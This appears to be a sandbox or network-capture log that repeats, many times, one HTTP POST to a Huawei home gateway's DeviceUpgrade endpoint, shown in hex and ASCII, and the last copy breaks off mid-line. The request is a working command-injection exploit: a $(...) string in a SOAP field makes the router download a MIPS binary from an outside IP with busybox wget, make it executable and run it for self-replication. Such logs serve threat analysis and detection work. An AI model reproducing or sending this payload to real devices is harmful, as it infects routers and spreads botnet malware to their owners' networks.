                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo 